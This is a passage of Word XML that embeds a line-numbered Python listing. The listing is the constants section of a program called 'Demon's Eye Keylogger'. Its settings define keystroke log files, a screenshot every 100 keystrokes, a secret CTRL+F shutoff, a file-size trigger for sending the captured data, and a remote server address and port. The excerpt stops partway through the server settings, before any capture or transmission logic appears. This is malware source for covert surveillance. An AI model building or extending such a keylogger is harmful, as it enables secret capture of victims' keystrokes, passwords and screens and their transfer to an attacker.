        <w:t xml:space="preserve">65   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="412"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="413" w:name="l66"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">66   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># CONSTANTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="414" w:name="l67"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">67   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="414"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="415" w:name="l68"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">68   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="415"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">APPNAME </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Demon</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s51"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">s Eye Keylogger'      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Simply a name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="416" w:name="l69"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">69   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="416"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">VERSION </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'0.0.2'                       </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="l70"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">70   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">LOGGING_LEVEL </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 xml:space="preserve">DEBUG           </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Log level. Can be -&gt; DEBUG, INFO, WARNING, ERROR, CRITICAL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="418" w:name="l71"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">71   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="418"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">LOG_FILENAME </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'DEKlogger.log'          </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># File name for the Log Level registered data (not keystrokes logging)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="419" w:name="l72"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">72   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="419"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">CRLF </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s51"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'                             </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Line Feed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="420" w:name="l73"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">73   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">KLGPRE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'klg_'                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Keylogger file name prefix (keystrokes logging and executable replicate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="421" w:name="l74"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">74   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="421"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">KLGEXT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'.dek'                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Keylogger file extension for data file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="422" w:name="l75"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">75   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="422"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRPRE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'scr_'                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Screenshot file name prefix</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="423" w:name="l76"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">76   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="423"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SCREXT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'.png'                         </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Screenshot file extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="424" w:name="l77"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">77   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="424"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYCODE_EXIT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">6                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># CTRL + F : special combination to close / deactivate keylogger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="425" w:name="l78"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">78   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="425"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">PYNPUT_CTRL_EXIT_CHR </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">'f'              </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># CTRL + char : special combination to close using pynput</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="426" w:name="l79"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">79   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="426"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYSTOSCREENSHOT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">100                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Screenshots every x Keystrokes (default value)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="l80"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">80   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">KEYMINCHARS </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">30                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Minimum key buffer size to dump data to disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="l81"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">81   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">FILESIZETRIGGER </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">4096                  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Default keylogger file size trigger to send data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="429" w:name="l82"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">82   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="429"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="430" w:name="l83"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">83   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="430"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Server constants</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="431" w:name="l84"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">84   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_IP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32" w:name="l85"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">85   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="432"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_PORT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="433" w:name="l86"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">86   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="433"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_BUFFER_SIZE </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>2048</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="434" w:name="l87"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">87   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="434"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_MAX_CLIENTS </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="435" w:name="l88"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">88   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="435"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">SERVER_ACCEPT_TIMEOUT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
